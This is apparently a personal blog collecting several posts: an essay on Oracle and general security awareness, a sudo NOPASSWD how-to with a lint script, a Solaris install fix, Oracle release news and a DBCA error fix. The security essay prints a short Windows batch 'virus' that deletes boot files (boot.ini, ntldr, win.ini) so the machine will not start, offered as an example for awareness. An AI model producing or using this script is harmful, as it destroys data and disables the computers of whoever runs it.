Me, Security & Oracle

Many questions come to mind when I start talking about Oracle security: how do I secure my databases, and what should I do?
Is adding a firewall to my network enough? Will enabling the Oracle audit parameter be enough?
Understanding security as a concept is very important for reducing the risk of attack, and to do that you should make sure your system is secure.
Security awareness is the first step in securing the system.

According to RSA reports, there was a 7% increase in the number of phishing attacks worldwide between July and August 2010. The United States currently leads as the country that suffered the most attacks from online cyber threats, with 35% of these aimed at US citizens; the US was also the country that hosted the most attacks, with 60% of phishing attacks starting from the US.
The graph below shows the number of network security breaches over the past 12 months (graph by Ponemon Institute).
In addition to the above reports, $1 trillion was the total value of intellectual property that hackers stole from businesses around the world in 2008.
As proof of this, I will mention three different stories about the top “black hat” hackers.
The graph below shows how much cyber-attacks cost companies over 12 months (graph by Ponemon Institute).
Jonathan James was 16 years old when he hacked NASA, which made him the first juvenile sent to prison for hacking. He installed a backdoor into a Defense Threat Reduction Agency server and broke into NASA computers, stealing software worth $1.7M and costing NASA $41,000 in repairs.
Adrian Lamo hacked into the NY Times and Microsoft using coffee shop Wi-Fi, and viewed personal information and high-profile subject matter.
The last example, Kevin Mitnick, spent two years stealing corporate secrets and breaking into the US national defense warning system.
Computer hacking is usually stereotyped in movies and cartoons as a guy sitting behind a desk with a Pepsi can and not much luck with the ladies. The truth is that this guy costs people and companies money and privacy; hacking therefore affects individuals, organizations and companies.
As individuals, victims of computer hacking can lose their savings, their privacy, even their lives. In the early days of computing the virus was the biggest security risk, causing data loss. After that it was replaced by malware, which is small software designed to do a job such as a key logger or virus scanner, but this software is no longer any fun now that hackers are the ones creating malware.
Nothing is easier today than writing a virus just to do annoying things; the code below is just an example of how a virus is written.
You can find steps for writing a virus, Trojan or even a worm on the internet for free. This is what makes the problem bigger, because an internal user can read this information and start using it, so you should be prepared for all these kinds of attacks.
Below is an example of a simple virus; all it takes is saving it as a batch file and putting it on someone's desktop.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
msg * SEND->> JOIN EVILKING TO +962795238146 for hacking tricks

What if the victim is a company or organization? The small effect a hacker could have is putting some employees out of work for a short period of time. The large effect is that the hacker could steal company secrets, cause data loss and do some damage. In the latest survey by Ponemon Research on behalf of Juniper Networks, 90% of companies had been breached at least once by hackers over the past 12 months, and 60% reported two or more breaches over the past year.

So companies and organizations should spend a small fortune on security software and hardware, and let us not forget to educate our employees.
Security today is considered the most important priority for a company, for two reasons:
1-      Personal data protection.
If you store data you should secure it, since it relates to customers or clients.
2-      Social responsibility.
Some of this data is very important and contains people's private information, which tells us that the company should protect this information by securing its systems.
When you leave your house for work in the morning or to hang out with friends in the evening, you make sure that your house is secure. Why? All this is to keep unauthorized people from access, damage and theft, by enabling the alarm system and making sure your doors and even your windows are locked. It is the same for companies and organizations: the same principle but with a different approach. The valuable thing in computers and networks is the data you create; this is the first reason why we have computers and networks.
An operating system can be reinstalled and hardware can be replaced, but we are talking about data, which is unique and sometimes irreplaceable.
Data is confidential and concerns people's privacy. This is the main reason why you don't want to lose it, and why you don't want others to even view it without authorization: Visa information, mobile numbers, social numbers and account numbers.
If it is left unprotected then the information can be accessed by anyone, and if this information falls into the wrong hands, your life becomes a nightmare. Quite often, ensuring your data is protected is a small price to pay to avoid future problems and prevent threats.
What if the data is not adequately protected? It may be compromised, which is called a security breach. I am not talking here about the individual level but about the business level, where it causes problems such as loss of reputation and lawsuits.
According to the Ponemon Institute, the cost of a security breach during 2008 was $202 per record breached. Imagine you have 1 million records: what could that cost the company?
Intruders do not care who you are or about your identity; they just want to control your computer. By doing this they can hide their location and start an attack.
By accessing the system, intruders discover new vulnerabilities to exploit in computer software. Don't forget that it is a network, which means access to other computers on the same network is possible. Complex, right?
But what about the law? All the above information is just reports and security principles; check the law below that talks about security and data privacy.
Cheers
Osama Mustafa

Use "sudo" Command without password Prompt

Sometimes you need to run a Linux command through sudo without a password prompt.

To learn more about this command, read the link here.

For example, there are three sudo commands I want to run without entering a password:

  • sudo reboot
  • sudo shutdown -r now
  • sudo shutdown -P now
To do this, follow the steps below:
  • Edit the /etc/sudoers file.
  • Add the following lines, replacing user and host with the username and hostname of the server.

user host = (root) NOPASSWD: /sbin/shutdown
user host = (root) NOPASSWD: /sbin/reboot

This will allow the user user to run the desired commands on host without entering a password. All other sudoed commands will still require a password.

Notes:

  • Always use the command visudo to edit the sudoers file, to make sure you do not lock yourself out of the system. For example:

sudo visudo -f /etc/sudoers.d/shutdown

  • Use /etc/sudoers.d instead of modifying /etc/sudoers: you can add the two lines to a new file in /etc/sudoers.d, for example /etc/sudoers.d/shutdown.
  • If you did not use visudo to edit your files and then accidentally messed up /etc/sudoers or a file in /etc/sudoers.d, you will be locked out of sudo. To fix it, use the command pkexec.
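
A pre-install check for the drop-in described above, as an added example that is not part of the original post. A sudoers command listed without arguments can be run with any arguments, so the constructed file pins the exact invocations from the post, and a lint flags NOPASSWD rules that are broader than that. `write_dropin` and `lint_nopasswd` are hypothetical names; `user` and `host` are the post's placeholders.

```shell
#!/bin/sh
# Added example (not from the original post). Function names are hypothetical.

# write_dropin FILE: constructed drop-in that pins the exact invocations from
# the post. In sudoers, "" after a command means "no arguments allowed".
write_dropin() {
    cat > "$1" <<'EOF'
user host = (root) NOPASSWD: /sbin/shutdown -r now, /sbin/shutdown -P now
user host = (root) NOPASSWD: /sbin/reboot ""
EOF
}

# lint_nopasswd FILE: print one finding per risky NOPASSWD command and
# return 1 if any were found. Heuristic only; aliases and extra tags are not resolved.
lint_nopasswd() {
    awk '
    /^[ \t]*#/ || !/NOPASSWD:/ { next }        # skip comments and password-protected rules
    {
        cmds = $0
        sub(/^.*NOPASSWD:[ \t]*/, "", cmds)    # keep only the command list
        sub(/[ \t]+$/, "", cmds)               # drop trailing whitespace
        n = split(cmds, c, /[ \t]*,[ \t]*/)
        for (i = 1; i <= n; i++) {
            if (c[i] == "ALL") {
                print NR ": NOPASSWD granted on ALL commands"; bad = 1
            } else if (c[i] !~ /^\//) {
                print NR ": command is not an absolute path: " c[i]; bad = 1
            } else if (c[i] !~ /[ \t]/) {
                print NR ": any arguments accepted: " c[i]; bad = 1
            }
        }
    }
    END { exit bad + 0 }' "$1"
}
```

Once the lint passes, `visudo -cf` on the same file checks its syntax before it is copied into /etc/sudoers.d.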
Cheers
Osama Mustafa

/usr/ccs/bin/as: not found/No such file or directory on Solaris 11.2

While trying to install Oracle Database 12c on Solaris 11.2, I faced the following errors in the logs, and dbca was unable to start:

INFO: sh[2]: /usr/ccs/bin/as: not found [No such file or directory]
INFO: make: Fatal error:
INFO: *** Error code 127

The package developer/assembler comes with the default installation, but on Solaris 11 the package developer/assembler is not installed.

To install it:

pkg install developer/assembler

Then try again.

Cheers
Osama 

OTech Magazine – Summer 2015

The Summer 2015 issue is the eighth issue of OTech Magazine, the independent Oracle technology magazine. Our contributors are the best of the best of the Oracle atmosphere.

Osama Mustafa – Database Link From Oracle to MySQL
Read the full version of the magazine here.
Thanks to Douwe Pieter for this amazing effort.
Cheers
Osama Mustafa

Officially Fusion Middleware 11.1.1.9 Is Available to download

“Oracle Fusion Middleware is the leading business innovation platform for the enterprise and the cloud. It enables enterprises to create and run agile, intelligent business applications while maximizing IT efficiency through full utilization of modern hardware and software architectures. Solutions and products include Exalogic Elastic Cloud, data integration, business process management, business intelligence, identity management, Cloud application foundation, service-oriented architecture, WebCenter, and development tools.”

Oracle Fusion Middleware 11.1.1.9 is now available to download:

  • Oracle Business Intelligence Enterprise Edition
  • Oracle JDeveloper and Application Development Framework (ADF)
  • Oracle Business Process Management
  • Oracle SOA Suite
  • Oracle Data Integrator
  • Oracle User Messaging Service
  • Oracle Enterprise Scheduler
  • Oracle Event Processing
  • Oracle WebCenter Suite
  • Oracle Identity Management
  • Oracle Forms and Reports
  • Oracle WebTier
  • Oracle Application Architecture Foundation Pack
Download the documentation from here.
Find the product installation steps here.
Download the products from here.
Thank you
Osama Mustafa

connection to database cannot be established – DBCA

Environment:

Oracle Grid Infrastructure 11.2.0.4
Nodes # : 4
Operating system : Redhat 6.6

When trying to configure Enterprise Manager, the following error appeared:

Connection to the database cannot be established because the listener could be down. Please make sure that the service is registered with a listener and the listener is up.

The listener is up and the VIP is working on all nodes without any issue. When I checked the dbca logs looking for more details, I found this error:

The dbca trace is in $ORACLE_BASE/cfgtoollogs/dbca.

ORA-1017: invalid username/password

Both were correct. Because of this I recreated the password file on all nodes and restarted my operation, and it worked without any issue this time.

Thanks
Osama Mustafa

OTN EMEA Tour 2015

For the second time, I will be glad to join the OTN EMEA Tour 2015 with other Oracle experts who devote much of their time to the Oracle Community.

We will cover the following countries:

  • Portugal.
  • Jordan – Amman
  • Johannesburg
Date             Location
May 21st 2015    Lisbon, Portugal
May 23rd 2015    Amman, Jordan
May 26th 2015    Johannesburg, South Africa

You can find all the information here.
If you will join us in any country, please sign up.
Thanks
Osama Mustafa